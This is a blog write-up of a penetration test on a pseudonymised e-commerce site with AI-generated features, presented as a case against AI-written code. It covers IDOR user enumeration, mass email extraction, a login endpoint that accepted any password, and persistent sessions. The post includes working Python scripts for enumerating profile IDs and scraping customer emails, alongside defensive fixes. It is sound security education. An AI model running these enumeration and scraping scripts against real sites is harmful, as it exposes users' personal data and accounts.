Intro

AI has had an impressive impact on our world. Companies and startups are raising billions in funding, new datacenters pop up like mushrooms, innovation happens on a weekly basis, and the masses are flocking to the new thing. While companies compete for the number one spot in this AI race, they are making wild claims that, from my perspective, are unlikely to hold up.

Boris Cherny (creator of Claude Code) posted on 27 December 2025 that 100% of his contributions to Claude Code that month had been written by Claude Code itself. From a non-technical perspective that is remarkable, but by the end of this write-up I'm sure we can agree it's more destructive than impressive.

For example, the leaked Claude Code codebase is four times larger than those of competitors who actually write their own code.

The Pentest

Let's walk through a real-world pentest of an eCommerce company that was founded and built well before AI. For confidentiality reasons, I'll call it ECM (eCommerce).

At the time of the engagement, ECM ran a secure Drupal base with AI-generated functionality added on top. They contacted me to test the new changes and provide security advice. This was a limited-scope test, but still very educational. Here's what I found.

Browsing the site, it was clear that not everything was vibe coded. It's a beautiful site with a large product catalog, good design and fast navigation. However, once we started looking at the HTTP responses, the AI-generated parts began to show.

Response headers looked off, CSP (Content Security Policy) headers seemed almost hallucinated, and overall security coverage was weaker than expected.
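To make "weaker than expected" a bit more concrete, here is a minimal Python sketch of the kind of header check you can run against a response. The list of expected headers and the weak CSP patterns are a common baseline chosen for illustration; they are not ECM's actual headers or my exact findings.

```python
from typing import Dict, List

# Illustrative baseline; ECM's real headers are not reproduced here.
EXPECTED_HEADERS = [
    "content-security-policy",
    "strict-transport-security",
    "x-content-type-options",
    "referrer-policy",
]

# CSP sources that largely defeat the point of having a policy
WEAK_CSP_SOURCES = ["'unsafe-inline'", "'unsafe-eval'", "*"]


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one HTTP response's headers."""
    # Header names are case-insensitive, so normalize before comparing
    normalized = {name.lower(): value for name, value in headers.items()}
    findings = []

    for name in EXPECTED_HEADERS:
        if name not in normalized:
            findings.append(f"missing header: {name}")

    csp = normalized.get("content-security-policy")
    if csp:
        # "script-src 'self' *; img-src *" -> ["script-src", "'self'", "*", "img-src", "*"]
        tokens = csp.replace(";", " ").split()
        for weak in WEAK_CSP_SOURCES:
            if weak in tokens:
                findings.append(f"weak CSP source: {weak}")
        if "default-src" not in tokens and "script-src" not in tokens:
            findings.append("CSP sets neither default-src nor script-src")

    return findings


if __name__ == "__main__":
    sample = {
        "Content-Security-Policy": "script-src * 'unsafe-inline'",
        "X-Content-Type-Options": "nosniff",
    }
    for finding in audit_headers(sample):
        print(finding)
```

It only inspects a dict of header names and values, so it works with whatever HTTP client you already use. It is a quick triage aid, not a full CSP evaluator.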

I started enumeration scans to find domains, subdomains and endpoints. While those were running, I mapped the site manually using Burp Suite. With all endpoints saved and a good understanding of the application, I went after the most obvious attacker goal, data exfiltration, and started testing for Broken Access Control.

The first test I did was on the /user page.

The URL looked like this:

https://ecm.com/user/23380100

This is a textbook IDOR (Insecure Direct Object Reference) candidate: a numeric user ID right in the URL. Your hacker senses should already be tingling.

Sure enough, when I changed the number and refreshed the page, I saw a different user's account.

At this point we were able to extract all usernames in the database just by requesting /user/0 up to /user/23380500. Access to addresses, orders or payment data wasn't available yet, but this was already a strong indicator of broken authorization.


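For reference, the enumeration itself needs nothing fancy. Below is a minimal sketch, assuming the profile URL pattern from this test and a session cookie from your own test account; `fetch_profile`, `enumerate_ids` and the cookie value are hypothetical names, and this is not the exact tooling I used.

```python
import time
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, Optional

# Hypothetical target pattern based on the /user/{id} URL; only point this at an in-scope host.
PROFILE_URL = "https://ecm.com/user/{uid}"


def fetch_profile(uid: int, cookie: str) -> Optional[str]:
    """Fetch one profile page with our own session cookie; None if refused or missing."""
    req = urllib.request.Request(PROFILE_URL.format(uid=uid), headers={"Cookie": cookie})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError:
        # 403/404: the ID is missing or (correctly) protected
        return None


def enumerate_ids(ids: Iterable[int],
                  fetch: Callable[[int], Optional[str]],
                  delay: float = 0.0) -> Dict[int, str]:
    """Walk sequential IDs and keep every page the server hands back."""
    found: Dict[int, str] = {}
    for uid in ids:
        body = fetch(uid)
        if body is not None:
            found[uid] = body
        if delay:
            time.sleep(delay)  # stay gentle on a production system
    return found
```

For example, `enumerate_ids(range(23380100, 23380110), lambda uid: fetch_profile(uid, "<your-session-cookie>"), delay=0.5)` would check ten neighboring IDs. Passing `fetch` in as a parameter keeps the loop testable without touching the network.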

Next, I looked for more IDORs.

After placing an order, I was redirected to these two endpoints:

- /api/order/conformation/{order_id}

- /api/order/status/{order_id}

Again, both endpoints were asking to be abused.

The first endpoint confirmed that IDOR was a widespread issue. The second returned useful data such as order_id, order_number, state, email and price.
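On the defensive side, the fix for both order endpoints is an object-level authorization check on every request. A minimal sketch, assuming a hypothetical `Order` record with an owner and a random per-order token for guest checkouts; the data model and function names are illustrative, not ECM's.

```python
import hmac
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Order:
    order_id: int
    owner_id: Optional[int]  # None for guest checkouts
    access_token: str        # random per-order secret, e.g. secrets.token_urlsafe(32)
    email: str


class NotFound(Exception):
    """Raised for both "doesn't exist" and "not yours", so IDs can't be probed."""


def get_order(orders: Dict[int, Order], order_id: int,
              user_id: Optional[int], token: Optional[str]) -> Order:
    order = orders.get(order_id)
    if order is None:
        raise NotFound(order_id)
    # A logged-in customer may read their own orders
    if user_id is not None and order.owner_id == user_id:
        return order
    # Guests must present the unguessable per-order token (constant-time compare)
    if token and hmac.compare_digest(token.encode(), order.access_token.encode()):
        return order
    raise NotFound(order_id)
```

Returning the same error for missing and foreign orders matters: otherwise the difference between the two responses is itself an enumeration oracle.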

With a simple Python script, we could now extract the email address of every customer, registered or guest, who had placed an order over the past 10 years.
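The script doesn't need to be clever. Here's a minimal sketch of the extraction step, assuming the status endpoint returns a JSON object with an `email` field; the response shape and the `extract_emails` helper are hypothetical, and the HTTP `fetch` function is left as a parameter.

```python
import json
from typing import Callable, Iterable, Optional, Set

# Assumption: the status endpoint answers with a JSON object that includes
# an "email" key (alongside order_id, order_number, state and price).


def extract_emails(order_ids: Iterable[int],
                   fetch: Callable[[int], Optional[str]]) -> Set[str]:
    """Collect unique, normalized email addresses from order status responses."""
    emails: Set[str] = set()
    for order_id in order_ids:
        raw = fetch(order_id)
        if raw is None:
            continue  # no such order, or the request was refused
        try:
            data = json.loads(raw)
        except json.JSONDecodeError:
            continue  # HTML error page or truncated body
        email = data.get("email") if isinstance(data, dict) else None
        if isinstance(email, str) and email.strip():
            emails.add(email.strip().lower())
    return emails
```

Normalizing case and whitespace collapses repeat customers into a single entry, which is what turns ten years of orders into a clean email list.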

At this point we had:

- all usernames

- all email addresses



While testing the login functionality, we found the final piece needed to turn this into a full exploitation chain.

There were two login endpoints:

- one old and secure

- one AI-generated and completely broken

I sent a request to the AI-generated endpoint with a correct email and a wrong password, and ended up authenticated as that user.

We received valid session cookies and full access to the account.
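I never saw the endpoint's source, so the following is only a hypothetical reconstruction of this bug class next to a fixed version. It assumes a simple in-memory user store holding a salt and a PBKDF2-HMAC-SHA256 hash per email; `login_broken`, `login_fixed` and the iteration count are illustrative choices.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple

# Hypothetical store: email -> (salt, PBKDF2 hash). Not ECM's schema.
UserStore = Dict[str, Tuple[bytes, bytes]]
ITERATIONS = 600_000  # illustrative work factor for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_record(password: str) -> Tuple[bytes, bytes]:
    salt = os.urandom(16)
    return salt, hash_password(password, salt)


def login_broken(users: UserStore, email: str, password: str) -> bool:
    # The bug class observed: a known email is enough, the password is never checked
    return email in users


def login_fixed(users: UserStore, email: str, password: str) -> bool:
    record = users.get(email)
    if record is None:
        return False
    salt, stored = record
    # Re-derive the hash from the submitted password and compare in constant time
    return hmac.compare_digest(hash_password(password, salt), stored)
```

In ECM's case the simplest fix is probably not a better second endpoint at all, but routing every login through the old, secure one.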

So now we can:

- take all usernames and emails

- send login requests with bogus passwords

- collect valid session tokens

- and gain full control over all accounts

At this point things are already looking quite bad, right?

We have usernames, emails and a direct path into accounts.

But as always, once you start pulling the thread, more things start falling apart.

I logged into a test account using the broken endpoint because I wanted to see how stable that access actually was. Getting access is one thing, but keeping it is what it's all about.

So I logged in, changed the password and logged back out.

Then I reused my old cookies, and they were still valid. There was no invalidation and no re-authentication; the session just stayed alive as if nothing had happened.

This means that once an attacker gets in, they won't be kicked out. Even if the victim resets their password, the attacker keeps access in the background.

At this point we moved from account takeover to persistent account takeover.


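The fix is to invalidate sessions server-side: on logout, drop that session; on password change, drop every other session for the user. A minimal in-memory sketch, assuming a hypothetical `SessionStore` class (a real deployment would back this with a database or cache):

```python
import secrets
from typing import Dict, Optional, Set


class SessionStore:
    """In-memory sketch: token -> user_id, plus each user's set of live tokens."""

    def __init__(self) -> None:
        self._sessions: Dict[str, int] = {}
        self._by_user: Dict[int, Set[str]] = {}

    def create(self, user_id: int) -> str:
        token = secrets.token_urlsafe(32)
        self._sessions[token] = user_id
        self._by_user.setdefault(user_id, set()).add(token)
        return token

    def user_for(self, token: str) -> Optional[int]:
        return self._sessions.get(token)

    def destroy(self, token: str) -> None:
        """Logout: forget this session server-side, not just in the browser."""
        user_id = self._sessions.pop(token, None)
        if user_id is not None:
            self._by_user[user_id].discard(token)

    def revoke_all(self, user_id: int, keep: Optional[str] = None) -> None:
        """Drop every session for user_id except, optionally, the one making the change."""
        tokens = self._by_user.get(user_id, set())
        for token in list(tokens):
            if token != keep:
                self._sessions.pop(token, None)
                tokens.discard(token)


def change_password(store: SessionStore, user_id: int, current_token: str) -> None:
    # (updating the stored password hash is omitted here)
    # Every other cookie for this user stops working immediately
    store.revoke_all(user_id, keep=current_token)
```

Keeping a per-user index of tokens is what makes "log out everywhere" cheap; without it you would have to scan every session to find the ones belonging to one account.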

While testing further, I noticed that some third-party endpoints didn't require authentication at all.

Things like:

- phone numbers

- emails

- full names

- tokens

- and UUIDs

were returned without any valid session.
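Endpoints that return PII should refuse to answer without a valid session. A minimal sketch of that guard as a Python decorator; the request dict shape, the `session` cookie name and the `SESSIONS` lookup table are hypothetical stand-ins for whatever the framework actually provides.

```python
import functools
from typing import Any, Callable, Dict

Request = Dict[str, Any]
Response = Dict[str, Any]

# Hypothetical session table: token -> user_id
SESSIONS: Dict[str, int] = {}


def require_session(handler: Callable[[Request, int], Response]) -> Callable[[Request], Response]:
    """Reject the request with 401 unless it carries a known session token."""
    @functools.wraps(handler)
    def wrapper(request: Request) -> Response:
        token = request.get("cookies", {}).get("session")
        user_id = SESSIONS.get(token) if token else None
        if user_id is None:
            return {"status": 401, "body": {"error": "authentication required"}}
        return handler(request, user_id)
    return wrapper


@require_session
def contact_details(request: Request, user_id: int) -> Response:
    # Only ever return the caller's own record, never one chosen by a parameter
    return {"status": 200, "body": {"user_id": user_id}}
```

The handler receives the user ID from the guard rather than from the request, so it has no way to serve someone else's data by accident.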

Even more interesting, sessions were partially tied to IP addresses, which caused very strange behavior. Data would leak based on IP matching, even when users were logged out.

This created situations where data was accessible without a real authenticated context.
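To illustrate why IP matching is the wrong way to identify a user, here's a hypothetical contrast between an IP-keyed lookup and a token-keyed one. I can't say exactly how ECM's code tied sessions to IPs; this only sketches the general anti-pattern. The address 203.0.113.7 is a documentation-range IP.

```python
from typing import Dict, Optional

# Hypothetical stores for illustration only.
IpSessions = Dict[str, int]     # client IP -> user_id (the anti-pattern)
TokenSessions = Dict[str, int]  # secret session token -> user_id


def resolve_user_by_ip(ip_sessions: IpSessions, client_ip: str) -> Optional[int]:
    # Anti-pattern: every device behind the same IP (home NAT, office, mobile
    # carrier) is treated as the same user, and nothing here knows about logout
    return ip_sessions.get(client_ip)


def resolve_user_by_token(sessions: TokenSessions, token: Optional[str]) -> Optional[int]:
    # Identity comes only from a secret the client presents; the IP is not consulted
    if not token:
        return None
    return sessions.get(token)


def logout(sessions: TokenSessions, token: str) -> None:
    # Deleting the token server-side is what actually ends the session
    sessions.pop(token, None)
```

An IP address can still be a useful risk signal (for example, prompting re-authentication when it changes), but it should never be the thing that grants access.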

This is one of those bugs that doesn't look flashy but is extremely dangerous, especially on a live production system with real users and data.

The site also showed delayed responses during HTTP desync (request smuggling) testing and lacked CSRF protection, but the scope was too limited to fully validate those findings. So I documented them and passed them on to ECM.
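For completeness, the standard fix for missing CSRF protection is a synchronizer token: a random per-session value embedded in each form and checked on every state-changing request. A minimal sketch, assuming the session is a plain dict and the form field carries the token back; the function names are hypothetical.

```python
import hmac
import secrets
from typing import Dict


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create (once) and return the per-session token to embed in forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def verify_csrf_token(session: Dict[str, str], submitted: str) -> bool:
    """Accept a state-changing request only if its token matches the session's."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())
```

A cross-site attacker can make the victim's browser send cookies, but cannot read the page to learn this token, which is why the check works.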

Impact

Here's what we found:

- Full account takeover (no password required)

- Mass user enumeration via IDOR

- Mass email extraction via IDOR

- Persistent sessions after password reset

- PII leakage without authentication

- Weak / broken security headers

- Expanded attack surface through information disclosure

An attacker could fully automate this and:

- take over all accounts

- build a complete user database

- maintain long term access

- operate with a low risk of detection

All of this without any advanced exploitation.

Final thoughts

This pentest proves a point we already kind of knew.

ECM isn't the first company to get "breached" due to AI-generated security holes, and it definitely won't be the last. The difference is that they handled it responsibly and protected their users.

That can't be said for many others.

Take teaforwomen.com, for example. On July 25, 72,000 private images, including selfies, IDs and other user-generated content, were exposed through an improperly secured dataset. The fact that the breach stemmed from an exposed dataset suggests it could have been prevented if Tea's cloud storage had been properly configured.

This sounds very similar to what we've seen here. And at the end of the day, it's real users who pay the price.

AI can be powerful for some applications, but for development it's just not logical enough.

I hope you enjoyed my write-up. My inbox is always open for questions or collaborations: Kennis.dev@icloud.com

Happy hacking!